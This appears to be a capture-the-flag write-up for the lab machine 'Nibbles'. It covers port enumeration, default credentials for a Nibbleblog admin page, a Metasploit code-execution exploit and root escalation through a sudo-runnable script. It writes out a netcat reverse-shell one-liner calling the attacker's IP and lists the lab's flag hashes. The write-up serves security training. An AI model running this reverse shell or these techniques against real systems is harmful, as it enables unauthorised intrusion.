# Nibbles

## Nibbles - 10.10.10.75

### Target Enumeration:

OS: Linux

IP: 10.10.10.75

User: b02ff32bb332deba49eeaed21152c8d8

Root: b6d745c0dfb6457c55591efc898ef88c

### Ports / Services / Software Versions Running

80/tcp open http Apache httpd 2.4.18

### Vulnerability Exploited:

Nibbleblog contains a flaw that allows an authenticated remote attacker to execute arbitrary PHP code.

### Exploiting the host:

Nmap

<div align="left"><img src="https://lh4.googleusercontent.com/420APuMpnY5dzCZSqWVD523n5g_W8pKJaiIIeGzQnqPrXd328dtykVKJk45av0SoALhP15ko5HzGsc1QRJHbBLsYlZ9OfUd_ny0urfG5iZyHebgDefpNUu87cTniOTn6gmVWTw7X" alt=""></div>

Visiting Port 80 and viewing the source code gives us the following:

<div align="left"><img src="https://lh6.googleusercontent.com/sMizMZOZAsyc395wV0AAG4RBAmn8tMVE9Cl3SK0fmD0fA9QLzK7_EeF-EzmNfvroYn8CkvoDvY3A4Es0rHKYAqotsdF0JyREN6NmAznQWyHeSI_wDfD1pluD_347NvWlKgf8A6xC" alt=""></div>

Using dirb against /nibbleblog gives us admin.php which is a login interface.

Testing the usernames and passwords for defaults gives us admin:nibbles

Searching for exploits gives us:

<div align="left"><img src="https://lh4.googleusercontent.com/5_clk_XuwBYZKsDyL-JBzWEyQ1YIsF4Xf5HDZimgEPN3WG8BrjwWejlKkg3imGb2Ykpbb29Eitrmun2993SoIk3b6aB07wuMPxZIBIGrNdPasCNYYKF7Y3NMmu4YV6ZDLHUcfiRz" alt=""></div>

We load metasploit and configure our options as follows:

![](https://lh6.googleusercontent.com/xoco6o95stqAIDhpSGwd7AQJHP-H_2tBS_PAHDmQW2QzfnVdziah9C1m9v4TBq13X0VvH0MJHD0CvV5XAFH8QM7wiqHMbsc5mqEfoi1RY4Zcb41PlYucXkTzapSuAubFhaBRssm2)

Run the exploit and get a low privileged user as nibbles:

![](https://lh5.googleusercontent.com/C3-5CAthS0662Q5SOKd5hXi9L6Tn7f7MsF5Lhbxodg7gN1SMoYp2W8hVbX45wMF_ctR8xpzx-FIjtieVE_xW6v4bUmsR95jGk1Z5d53KSvHjtVdIRCJDv51RpE6bDEebS5KefEZj)

Running LinEnum.sh on the host gives us a potential lead.

<div align="left"><img src="https://lh4.googleusercontent.com/LDGUHiqopRx9z334InU4SKnmlO5L3R8_o37izQDJuv3OBWS6Rx6HhS1WKshonDx_s7DyO5Yzf8MHHebtn1UFYbklr1qUzwZydBN0zMOgMlG35FfKVLFEckyjnI29Uf-60RFTz3L0" alt=""></div>

So we need to unzip personal.zip within /home/nibbler and modify monitor.sh to get root.

<div align="left"><img src="https://lh3.googleusercontent.com/e_Dm39PPslm7aFuw8_jTZII3MQEWJxEcunw52JReAPBAexEXp8Stkpl0f_nRiEcn_kMaMJBcjK1v1wjYmDIPkwYzIPuqtoxMXASUFMiQL0QP64Lvx2mPpfhytlaRmXXJKeCCx52M" alt=""></div>

We set up a nc listener on port 2491 locally and we insert the following command into the monitor.sh file:

echo “rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.49 2491 >/tmp/f” >> monitor.sh

We then execute the monitor.sh file with /usr/bin/sudo to receive our root shell.

<div align="left"><img src="https://lh6.googleusercontent.com/w-6LVMBsAw2AOCm1Ge5qb7k6oUgGH0oWxGN872gwDfJqRkL30sCx79C01uPh98YzgTLhlk1u5pwAV5k2DWbVSraSooLwMmdTy9Vbgl7kCrz3m133tQ3uMr53LR0-GgXv0X82t6p5" alt=""></div>

And we receive a root shell in return.

<div align="left"><img src="https://lh4.googleusercontent.com/0AeFJXDNIcZ3xav-z4fz1-ecaIjn7kTNpnJNgHabxTKlQqL1majEDQCePsCrmQaPIqrl2eoQPeI35CPblt0y9czGCJbbnIf2gDFIZKEvMkaXwtZlmGAGtlOThKMwR-Vv2Cv5IHoc" alt=""></div>